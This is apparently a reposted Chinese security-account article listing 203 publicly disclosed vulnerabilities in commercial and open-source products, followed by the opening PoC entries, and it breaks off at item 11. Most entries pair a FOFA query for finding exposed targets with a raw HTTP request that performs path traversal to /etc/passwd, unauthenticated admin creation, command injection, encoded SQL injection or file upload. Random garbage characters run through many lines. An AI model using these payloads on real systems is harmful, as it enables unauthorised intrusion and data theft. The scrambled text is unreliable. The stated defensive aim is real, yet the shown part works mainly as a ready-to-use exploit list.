互联网公开漏洞整理202309-2024061 a! W: o: B. O9 C& o" g! [
道一安全 2024-06-05 07:41 北京
# `$ B/ ?5 k" J0 n, B/ [1 Y. V以下文章来源于网络安全新视界 ,作者网络安全新视界" z2 ]* e/ I- l; c+ J) r1 N5 [1 f
( ?5 e+ T: @! O5 X1 n4 q
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
1 C7 L! V+ R) n0 c* E" t
4 D5 _' V5 k6 B$ N& R6 C. k ?漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。$ {) X5 L, N0 i, z) ^
0 \1 @8 k% D: R$ i" O5 t2 U
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
: D3 K8 m3 i/ ^8 o- ?* u. d" o' R7 |. L$ g8 J7 R' Q
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
# q G) a4 }) E. H& G# Z+ }$ z' o$ H v
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。+ S k! ]! C+ g+ x0 j7 A0 b* R \
1 e4 u( s6 J4 Z7 M
4 N: [1 O- W r7 d3 p声明
" Y/ b5 @- Q) {* f1 C5 c
9 Y$ p; N7 c; @6 M# K# v为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
4 `1 \5 w: ]$ g7 v1 L. m5 x9 D2 j
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
6 {& h9 R* ^* O
p+ \. ^) g* v" p' k3 u, Z: t6 \' k0 T A4 r
$ `1 \! S; T0 \# o8 c& m目录1 A! Y! z) m7 m
8 \+ w+ B' q& K# K1 y- b, [
01
: X6 ^( E. e6 x/ y+ ~
( X$ L6 n0 ^" Q ~# `8 T1. StarRocks MPP数据库未授权访问
3 n5 Y# z8 O. T4 @" o9 v2. Casdoor系统static任意文件读取4 E& t+ z6 {/ ~
3. EasyCVR智能边缘网关 userlist 信息泄漏
2 |& v# y- \; Q) N* {4. EasyCVR视频管理平台存在任意用户添加. L; u! j2 P4 [" C G
5. NUUO NVR 视频存储管理设备远程命令执行( u8 T8 y* y8 R' z5 U
6. 深信服 NGAF 任意文件读取( F2 ~2 t7 M" ~/ I y0 _! v
7. 鸿运主动安全监控云平台任意文件下载( A8 ]& u- a! d- r: Q
8. 斐讯 Phicomm 路由器RCE
8 S" O. u' [, c0 `' J+ _9. 稻壳CMS keyword 未授权SQL注入- b. n5 e( i7 W' [9 B
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
1 k# M) z! ]' V$ Q6 h2 D' f11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: _, P$ p' M; z
12. Jorani < 1.0.2 远程命令执行, X% B) J/ u* i
13. 红帆iOffice ioFileDown任意文件读取8 L$ X7 A# I1 r, N1 z) t# ~# F3 D
14. 华夏ERP(jshERP)敏感信息泄露
$ J: w9 y( g# m% Y15. 华夏ERP getAllList信息泄露
4 L# y* k/ r& b16. 红帆HFOffice医微云SQL注入* m& e, g. B2 \( V9 g, }# q, a
17. 大华 DSS itcBulletin SQL 注入
0 p& n" y* A. B9 \0 u! m% c18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. a% D+ V9 V+ p$ j6 X2 M6 s6 w
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入+ \& h( \* I( d) i9 ]9 M
20. 大华ICC智能物联综合管理平台任意文件读取
' X6 e" B: L \% i. u2 v21. 大华ICC智能物联综合管理平台random远程代码执行
7 |% R2 G: q6 D* P8 M22. 大华ICC智能物联综合管理平台 log4j远程代码执行
) Z8 u2 M( E! Y23. 大华ICC智能物联综合管理平台 fastjson远程代码执行: c5 E" D+ G4 B% D; j5 }
24. 用友NC 6.5 accept.jsp任意文件上传* Z' K2 W+ q2 {, ?7 N+ B5 Y
25. 用友NC registerServlet JNDI 远程代码执行
( R' L# p- Q! y" G2 Q" `+ ~9 f26. 用友NC linkVoucher SQL注入, G% @6 A% d% [% C) ~0 b
27. 用友 NC showcontent SQL注入6 ` C8 R: [1 ~! a
28. 用友NC grouptemplet 任意文件上传
3 Y- H2 E( [5 |7 M- Q0 U2 x29. 用友NC down/bill SQL注入
- P F- b3 {* G4 _+ o' x30. 用友NC importPml SQL注入, I, c& y$ ?) d n' Q$ B' D
31. 用友NC runStateServlet SQL注入
3 _: y0 @# S5 i' p: m# w& I32. 用友NC complainbilldetail SQL注入0 y. n9 b) g7 u9 h" u& W, b1 T( D5 \
33. 用友NC downTax/download SQL注入
8 c+ |% c6 r& x* Z) y9 v5 B34. 用友NC warningDetailInfo接口SQL注入
3 k) C! Z! P2 o8 L% H35. 用友NC-Cloud importhttpscer任意文件上传; D& [% U0 o# F# S" |6 C
36. 用友NC-Cloud soapFormat XXE
9 S `( W( u# q I5 i+ C4 H37. 用友NC-Cloud IUpdateService XXE( j' ]8 ?; ^) W5 a; m" L! Q# f
38. 用友U8 Cloud smartweb2.RPC.d XXE
( K( o3 t, P3 U+ G1 q39. 用友U8 Cloud RegisterServlet SQL注入8 b4 V. {8 i/ d8 `
40. 用友U8-Cloud XChangeServlet XXE
: G6 c5 F( L9 k3 C1 c41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
( g9 }5 E& C" n/ b- E! Q% {42. 用友GRP-U8 SmartUpload01 文件上传
. C2 X. D# v1 g8 v. N r3 z43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* ~5 U- n8 R$ C: @5 x44. 用友GRP-U8 bx_dj_check.jsp SQL注入# b- L; ~) ]7 w, P
45. 用友GRP-U8 ufgovbank XXE
& b4 F) p) A$ Z, M+ O46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. g2 p! S1 g4 a0 ?47. 用友GRP A++Cloud 政府财务云 任意文件读取3 b0 T8 I8 O) A8 x1 N; ]
48. 用友U8 CRM swfupload 任意文件上传2 s# u0 K8 R5 l6 s# f3 M6 {
49. 用友U8 CRM系统uploadfile.php接口任意文件上传$ z4 K9 T1 i1 j. m( Q
50. QDocs Smart School 6.4.1 filterRecords SQL注入
R5 b! o2 X1 ]0 M9 y51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入5 e; l" u3 ~$ T, S6 ^. t" r. @) v3 b' m, y
52. 泛微E-Office json_common.php sql注入1 q f9 T# t- D9 g2 Q/ Y
53. 迪普 DPTech VPN Service 任意文件上传4 t% S9 j' I: ?$ t! P
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
2 M5 o7 P# ]0 y( _3 P55. 畅捷通T+ getdecallusers信息泄露2 `: W# c Z4 H: Y8 f# K" U2 a
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 K8 P' K0 `+ x) t+ O0 K57. 畅捷通T+ keyEdit.aspx SQL注入
0 B- Y( Z# T. D' ]/ E0 o0 X, s. k58. 畅捷通T+ KeyInfoList.aspx sql注入
; n; V3 J* W2 @! ~5 w3 Y/ b59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
) `: P$ [* X: ?: A6 A- w4 W60. 百卓Smart管理平台 importexport.php SQL注入
8 m2 z7 c$ D) D8 I5 T: M. @61. 浙大恩特客户资源管理系统 fileupload 任意文件上传5 d; \( z, q$ B. C# b
62. IP-guard WebServer 远程命令执行' l) a/ k. D1 D! [4 C" i7 i
63. IP-guard WebServer任意文件读取
X: x! ]/ d. M( e, ?/ n/ m64. 捷诚管理信息系统CWSFinanceCommon SQL注入
" `4 x# G F4 T* g65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
' H" D* O9 D; q* x# m66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入3 z3 l& `0 T6 Y# e
67. 万户ezOFFICE wpsservlet任意文件上传& g" w) N8 Y! F/ L7 \ f7 D+ u& A
68. 万户ezOFFICE wf_printnum.jsp SQL注入
$ p4 p+ i9 f: p" e8 r69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 ~& E" S* R; n70. 万户ezEIP success 命令执行5 k2 d3 i- e* _( |8 h4 G7 { k( g
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入2 W s9 w6 }& W+ Q+ m9 F
72. 致远OA getAjaxDataServlet XXE+ M% F4 ~- `/ ?& W9 C! S1 x. l
73. GeoServer wms远程代码执行
% A# T- E' n% [ r) O/ d$ S& D74. 致远M3-server 6_1sp1 反序列化RCE. R! r1 z7 X/ A/ W' ~1 e) W; \
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; d( G6 x5 D! m76. 新开普掌上校园服务管理平台service.action远程命令执行3 R8 M c) t! d3 t
77. F22服装管理软件系统UploadHandler.ashx任意文件上传" f$ f5 Q1 r1 K1 }6 d+ A+ L: v. A
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 m3 m v+ w: g( n79. BYTEVALUE 百为流控路由器远程命令执行
9 D# h9 I! ~& @' o, _80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传! ?/ b: w. ~) I0 Q8 |' z/ o* X
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露) y: g& u* Y9 g* Q# S
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
P- f) t( q! c83. JeecgBoot testConnection 远程命令执行
: b8 M6 N2 B& i% [* @0 q- I84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
$ I* G5 \$ k0 r5 E' V0 \: ]/ o) I85. SysAid On-premise< 23.3.36远程代码执行- B& T! R* b0 o7 v0 a9 k" P+ m7 ~
86. 日本tosei自助洗衣机RCE
4 U4 l3 b7 N; B+ o6 C: E/ T87. 安恒明御安全网关aaa_local_web_preview文件上传' e T" d q, E+ P* |+ {: Y! x- R
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行: R* c& c% C( ~# j" k( f
89. 致远互联FE协作办公平台editflow_manager存在sql注入2 c B2 Q6 s$ F) b: z2 `% A
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行! H' e" I6 Y9 @" x1 f x( A
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取% D. n, I! |: c- L, R! X) r; m
92. 海康威视运行管理中心session命令执行- M9 @1 X7 c0 D( I; g! j% O6 r
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传' ?' I3 h# H9 M2 E; K
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
8 S. K& ?( m8 p a9 E: R% }: M6 y95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
/ l% ^" H7 P! M' @96. Apache OFBiz 18.12.11 groovy 远程代码执行4 f! Y! q! `# ~
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行4 z4 L0 u4 Z5 E
98. SpiderFlow爬虫平台远程命令执行/ o: Y6 Y% \- c1 `- r
99. Ncast盈可视高清智能录播系统busiFacade RCE
* O, } N' p- A100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
5 `* |/ o: G- V& n101. ivanti policy secure-22.6命令注入
! q% `, Y! _( ]0 {9 w+ j* e& J102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
! i1 ?2 M( c! ~: W( O103. Ivanti Pulse Connect Secure VPN XXE
4 M3 e# C1 E8 F104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露+ V/ J# Z7 n2 x; b+ t
105. SpringBlade v3.2.0 export-user SQL 注入) e# r$ K0 E, x. a3 w& Y& I
106. SpringBlade dict-biz/list SQL 注入, y* v, c' ~) m0 t/ V% b
107. SpringBlade tenant/list SQL 注入
8 H" r8 C% p9 |2 O108. D-Tale 3.9.0 SSRF" @( u" S* v+ A: e+ H
109. Jenkins CLI 任意文件读取
" j- g0 u# ~0 y6 N4 J6 P* ?( _5 r110. Goanywhere MFT 未授权创建管理员. a& }3 |1 W" M: m" m8 i1 e
111. WordPress Plugin HTML5 Video Player SQL注入6 |+ v) X! `: P, g! r6 M
112. WordPress Plugin NotificationX SQL 注入, P$ p) V* H! D# @8 [7 [9 k
113. WordPress Automatic 插件任意文件下载和SSRF0 x4 ~; U* Y# y4 ^2 T$ F6 X x
114. WordPress MasterStudy LMS插件 SQL注入7 T! v; k3 I1 s
115. WordPress Bricks Builder <= 1.9.6 RCE; c* |' ^' ?% z, c7 I
116. wordpress js-support-ticket文件上传4 a6 @9 H" M6 Y# C7 |- L) U
117. WordPress LayerSlider插件SQL注入, v; f$ _7 J% J! ?% Q4 t9 b* l9 o7 j
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
( U. m' z0 r: G; e) _+ f119. 北京百绰智能S20后台sysmanageajax.php sql注入
! n3 K! R3 w1 Q9 O$ |120. 北京百绰智能S40管理平台导入web.php任意文件上传
6 s1 u/ Y1 x- D& W) a121. 北京百绰智能S42管理平台userattestation.php任意文件上传
) U; ~1 Q9 O, {- S% V p122. 北京百绰智能s200管理平台/importexport.php sql注入6 W3 W% N C( F
123. Atlassian Confluence 模板注入代码执行
. h: u( y2 K3 f8 j# ?124. 湖南建研工程质量检测系统任意文件上传" o' Y& n( F0 {+ s `9 V. p: t Z
125. ConnectWise ScreenConnect身份验证绕过3 X! H3 y: n& f* z
126. Aiohttp 路径遍历
. S9 \) ^9 ?$ g- {127. 广联达Linkworks DataExchange.ashx XXE
( `- c9 s2 i0 w5 H) b128. Adobe ColdFusion 反序列化" }6 S- {% N2 e1 {& I
129. Adobe ColdFusion 任意文件读取2 U/ B, r, [0 `- s+ _7 W7 B' y4 y
130. Laykefu客服系统任意文件上传+ N. d/ @' ^, Y0 H9 h
131. Mini-Tmall <=20231017 SQL注入# Y. T% c1 w7 B# j( y. I& d
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
( F: G3 g, ?6 y. H6 ^133. H5 云商城 file.php 文件上传: Z: V1 G. s; I; I
134. 网康NS-ASG应用安全网关index.php sql注入- P' b- k& f. [( ^ R" L% E$ ^3 U" e0 u
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入7 d) W1 m- i5 ]3 P# v
136. NextChat cors SSRF, J9 \ S: y4 |: Z
137. 福建科立迅通信指挥调度平台down_file.php sql注入% N4 }- D9 J- ^5 W/ K
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
6 o3 }- N' N& ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入
# y5 V T# B0 ?6 l( t140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 }& b9 ^; b3 E/ u5 t1 W" b3 ?141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入. q1 G2 @; s. Y' D
142. CMSV6车辆监控平台系统中存在弱密码
( m2 c7 O: h: l6 J/ @( T6 f143. Netis WF2780 v2.1.40144 远程命令执行$ q; m( \, G) B* v3 A' {- M4 Z
144. D-Link nas_sharing.cgi 命令注入1 f1 _9 S3 f$ a% P: H: w7 w2 p
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# V6 Y+ a1 L9 T \' ~
146. MajorDoMo thumb.php 未授权远程代码执行
9 v8 `0 z, [* h147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
( `( f! k/ b. \) {. Q* o148. CrushFTP 认证绕过模板注入
8 I/ p, Q) N+ ?& l: H0 j6 }# m5 Q149. AJ-Report开源数据大屏存在远程命令执行
) N& S3 p0 A1 w4 `4 J150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 Q, P4 L, a/ k/ W151. AJ-Report 1.4.1 pageList sql注入
$ d P7 t: ]" \& z152. Progress Kemp LoadMaster 远程命令执行' m+ s1 T: k) G* |! C0 E
153. gradio任意文件读取
3 m" }, l N0 Z# ~$ v154. 天维尔消防救援作战调度平台 SQL注入
% \7 f* W; q! u0 P155. 六零导航页 file.php 任意文件上传- i, S- `: r5 w
156. TBK DVR-4104/DVR-4216 操作系统命令注入& o. }: O$ {# c2 D9 L9 J
157. 美特CRM upload.jsp 任意文件上传
/ t4 F! J0 }: D- ^' q+ k158. Mura-CMS-processAsyncObject存在SQL注入9 G5 y$ x$ i) b$ C7 R! @& F2 v
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传- o3 i8 w. p& _$ G
160. Sonatype Nexus Repository 3目录遍历与文件读取
& s7 i& D& J; `& d1 l$ h161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
1 x1 o- W0 g7 W9 |162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
& g5 R* P Q& I1 n& l2 M ?, f' J! X163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ R) C- o3 Y1 B# Q: C
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) O9 O, I# C! \# G3 q; }165. OrangeHRM 3.3.3 SQL 注入, ]7 e- o9 k4 }
166. 中成科信票务管理平台SeatMapHandler SQL注入0 R4 H" l- ~: y# w
167. 精益价值管理系统 DownLoad.aspx任意文件读取
. f+ G) k& N+ O! {" M' Z- B' \: N1 L168. 宏景EHR OutputCode 任意文件读取4 U+ ~$ h/ d( f1 k4 |
169. 宏景EHR downlawbase SQL注入* K( d* s: t" V# X5 t
170. 宏景EHR DisplayExcelCustomReport 任意文件读取7 d' Q( t! |, W
171. 通天星CMSV6车载定位监控平台 SQL注入
: N: v' k0 z* ]: G; n7 ^172. DT-高清车牌识别摄像机任意文件读取
3 v. j6 [+ E" O, f6 i: a173. Check Point 安全网关任意文件读取
' |* Q; h& A$ v1 U174. 金和OA C6 FileDownLoad.aspx 任意文件读取* J! l) @' [7 z/ h F
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
& G0 }; ~9 K5 n# J' o0 \) N176. 电信网关配置管理系统 rewrite.php 文件上传
& c* O, h: R- s6 U+ E% d. A; @177. H3C路由器敏感信息泄露
* D" l+ g+ v/ I$ ^6 O178. H3C校园网自助服务系统-flexfileupload-任意文件上传
6 D0 m/ X; r2 k5 J: S8 h2 i179. 建文工程管理系统存在任意文件读取
3 u/ I( _% o1 @. K& m. M' Q8 E180. 帮管客 CRM jiliyu SQL注入
- w3 f* K/ b# e N8 n& K181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
2 y q- j+ c3 ?$ ?9 R4 \" U; g182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建- _% l, }- A* j/ |4 r8 j1 x- ~5 z" F
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
0 [# @, y/ z) d- h$ j/ ]. ^1 K184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
l9 s- i( M) g; Q185. 瑞友天翼应用虚拟化系统SQL注入- Y1 }7 J3 F8 T: j3 ?& P4 c) m& r
186. F-logic DataCube3 SQL注入
! p0 n; E" I" q8 A187. Mura CMS processAsyncObject SQL注入
6 _( q$ B' G0 w+ J188. 叁体-佳会视频会议 attachment 任意文件读取
( l/ D% j2 Z" `189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 M2 D- `/ d5 S+ z+ ?190. 短视频矩阵营销系统 poihuoqu 任意文件读取( x+ d3 K, M/ w1 o
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入3 i1 i0 q2 u% Q7 R& N4 ^( a& u+ [
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传6 Q% M( Q/ _3 E
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行$ r/ w" |) `- n: Q
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
% {2 j V/ ?+ I5 _1 b, C195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
0 \4 P6 l- i4 ?9 b9 a196. 河南省风速科技统一认证平台密码重置
' [ `) g7 p. p. a7 u197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入4 z) {# J- H* r# @1 }
198. 阿里云盘 WebDAV 命令注入. {) f9 q) H1 e% b& `
199. cockpit系统assetsmanager_upload接口 文件上传6 [4 Z+ G7 Q& b- D7 Z
200. SeaCMS海洋影视管理系统dmku SQL注入
$ f8 h7 Z# g7 F6 f. l" w201. 方正全媒体新闻采编系统 binary SQL注入
% W2 f8 G! v# W8 b9 W202. 微擎系统 AccountEdit任意文件上传3 J/ {5 z+ Z5 a
203. 红海云EHR PtFjk 文件上传
' b- [( u0 T7 Y f. ]
3 K/ _$ t3 S+ S$ lPOC列表! J A$ }; B6 ^7 i5 }
/ x: [0 L: b6 Q( n9 Z
025 @; L, P7 Q* r `2 q; q) n
* b) O5 B/ Y1 A( {1. StarRocks MPP数据库未授权访问
[" Y7 X% z. sFOFA :title="StarRocks"" k& w: k/ p0 f
GET /mem_tracker HTTP/1.1
& T' E" U9 l3 r2 |Host: URL5 O3 h% h$ d2 \5 V
" O5 g I5 q u8 q+ w9 W& I9 b. v% Z8 V8 p; w) ~% v2 F9 h3 d7 f
2. Casdoor系统static任意文件读取; k% g4 i1 e& u4 T7 F4 Z* J9 g
FOFA :title="Casdoor"
! e3 z0 E1 ^0 ?6 S5 `" W' c1 _GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1, E% s* }9 Z/ R6 ~: k( e
Host: xx.xx.xx.xx:9999
3 P: S& A: l6 m5 S* L6 M3 {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 }+ {' {( F$ \% }! NConnection: close' l& C# u% Y2 ^, Q- z0 N0 `
Accept: */*
$ w# u0 k+ H& W1 X/ wAccept-Language: en$ A( d6 h L$ Q7 M
Accept-Encoding: gzip
- s3 _4 R, x" _7 t( V% F6 }+ ^
. E5 p% Y6 Z, v" O5 u
- K, U4 C6 W( q: m3 B( h3. EasyCVR智能边缘网关 userlist 信息泄漏
+ D0 Z8 ?1 b2 LFOFA :title="EasyCVR"# c2 f2 O4 o7 d+ } Y: _
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
" Y% Z0 c9 J3 n4 c! lHost: xx.xx.xx.xx
4 m0 w4 [7 W" O/ B3 M. |0 V# Q- G: Z! D8 r- F3 _
0 Z* U+ W4 r3 u4 n& _ x! r2 _4. EasyCVR视频管理平台存在任意用户添加7 H& T" i& L0 D0 I Q+ R: `$ J: G
FOFA :title="EasyCVR"/ r" M: t! M% M( G8 w
( n2 a0 r7 a4 s- ]4 R: }0 \: j5 K
password更改为自己的密码md5
U; V9 N. W- E/ D7 p* ~POST /api/v1/adduser HTTP/1.1
^' M# Z. X, d0 j0 H9 i# R8 QHost: your-ip
% v5 V/ v- R% E Z( R( d$ M+ e% x4 bContent-Type: application/x-www-form-urlencoded; charset=UTF-8
# x) }# v/ E& t9 F1 ~
$ X* X2 Q- ~: J/ T# i8 Oname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1 S; r7 _7 P" J" ~ v6 \
0 \( E( h5 e* E; ]/ [# z1 S" F3 ]7 A3 k* F
5. NUUO NVR 视频存储管理设备远程命令执行
4 x! g: F5 Y/ mFOFA:title="Network Video Recorder Login"
3 D4 `4 O" k( o& e6 O$ x2 SGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
5 H( K n$ e( N' |Host: xx.xx.xx.xx
& d% ~. x9 a5 W$ D! R! w8 D6 |( B2 _4 F% q4 |5 S
% D: i: ?8 a ^+ X. I6. 深信服 NGAF 任意文件读取
8 y3 h) Q$ t# r" S) @FOFA:title="SANGFOR | NGAF"7 `3 m9 V) e* D4 m
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.14 q5 v' N3 `- g0 ~2 t" w
Host:
3 x6 M; a A3 O, q6 ^9 `1 Q! v5 b3 W" D' [" ?$ v7 O1 V& f
# _" A8 A! K8 B% j, z* Z
7. 鸿运主动安全监控云平台任意文件下载
$ }. I. h9 @; ^8 n/ n- z& [) nFOFA:body="./open/webApi.html"
1 u/ e* T0 O+ u5 o$ t- f( JGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
; H+ K) [* _; ~* z2 SHost:6 R7 Q4 p5 M Z$ u
, P% \5 B0 F7 @# H0 T
: {( F; _* O9 b; P( c. S8. 斐讯 Phicomm 路由器RCE
0 y$ e! T7 S) H# AFOFA:icon_hash="-1344736688"# ?2 e* Y4 [, t, d* H/ C
默认账号admin登录后台后,执行操作
6 F; g5 b2 n$ jPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.10 l C6 O* L9 Y) W- M. D
Host: x.x.x.x# U, L) q# r9 M% d L S
Cookie: sysauth=第一步登录获取的cookie$ L. D4 A& O7 g" Z5 R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz! B* Y1 |% T+ B, H, K
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36* g" T' z3 A3 v% N* a$ N" ]: n# s
* w( `3 ]5 a& w: I------WebKitFormBoundaryxbgjoytz& k2 z! P3 X6 O: k. `
Content-Disposition: form-data; name="wifiRebootEnablestatus"$ S8 `2 j9 e- e# X1 D& s! x; q
2 k% ~' o: C6 Y+ c0 m6 s
%s
, t% \+ V3 E* ^- A; L------WebKitFormBoundaryxbgjoytz
u) G( K' m7 n$ o+ W4 s& {9 |) lContent-Disposition: form-data; name="wifiRebootrange". B$ y3 p; `# {$ q0 m9 U
; E" v' k' f( q
12:00; id;
Q& I5 u+ }* S" `; z------WebKitFormBoundaryxbgjoytz
) u8 z3 C8 ^, \- h9 p" ?Content-Disposition: form-data; name="wifiRebootendrange"
o1 d, u; l1 O) D
% Z% a) c( @ \- T) r%s:. E5 F6 u, W# \3 d; B
------WebKitFormBoundaryxbgjoytz/ j( {" }0 m$ O: j8 B9 P
Content-Disposition: form-data; name="cururl2"
) ^$ l3 }: J5 R: Y
* s" s$ i* r3 e2 |9 N* L) g. R) L, ]6 K: d5 s9 E, T
------WebKitFormBoundaryxbgjoytz--
5 i4 U, r9 A2 f+ H# K8 p3 {$ @+ K* Z1 q% u
# \! r7 F: E3 G6 p* j# z
9. 稻壳CMS keyword 未授权SQL注入4 T% M. Y7 ]% A/ s4 q
FOFA:app="Doccms"/ H% _' Z6 c1 q/ Z U8 I6 I0 @1 a
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.10 f U, F# u( F/ ?. b1 c
Host: x.x.x.x
8 d# G- }3 N+ z% V: M! z' w# W# J" p! J) C0 H
+ d2 `2 ^" F4 Z. b
payload为下列语句的二次Url编码
; h7 z1 m0 @. x: |, i7 T! t! x
# W# e0 G, K# w' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#! ^) t) E; Z7 ? _* N3 B
. i7 E d/ ~) C# o2 K! j6 S10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
% f# z0 [, u; j8 `" R( RFOFA:icon_hash="953405444"
( z+ Z8 I/ T& B7 n/ l0 I+ M5 A" q& ^8 g# D
文件上传后响应中包含上传文件的路径
* d( Q5 B! a0 r, X7 V$ t2 j% BPOST /eis/service/api.aspx?action=saveImg HTTP/1.1+ f4 f& N1 q" o7 f( \7 P' U
Host: x.x.x.x:xx- \4 f6 g- d! N( ?# I7 [0 K3 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
# w' ?: f9 \2 y5 y. nContent-Length: 197' u' y' \6 c8 p7 W& ^3 i# X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" y0 F {7 d9 M I' y' |
Accept-Encoding: gzip, deflate, ?- u) l, s% F4 n4 K; |
Accept-Language: zh-CN,zh;q=0.9
4 ?" B. N6 R6 S3 L6 K1 k) DConnection: close
! m/ ?! v* M. N$ rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu8 O: l6 ]" J+ O9 A8 q
. l) g1 ?6 p/ w7 k' Q/ [+ l0 q0 q) s------WebKitFormBoundaryxdgaqmqu
$ C5 a5 i% a& VContent-Disposition: form-data; name="file"filename="icfitnya.txt") R! e9 S; b: I2 M: [ P
Content-Type: text/html. I7 e- ]6 W) Q5 v& a3 b/ x4 Q+ R
# Y, R7 l2 [& Q# @& p7 fjmnqjfdsupxgfidopeixbgsxbf
; \( F6 e C' y0 e. r------WebKitFormBoundaryxdgaqmqu--: L5 B7 U& E3 C3 s* s3 n
& r* _6 z1 s9 K, @* p! s
, M) e. }# q6 f. V
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入& C/ q4 N+ C. l) \. A. f/ K. Z" `
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
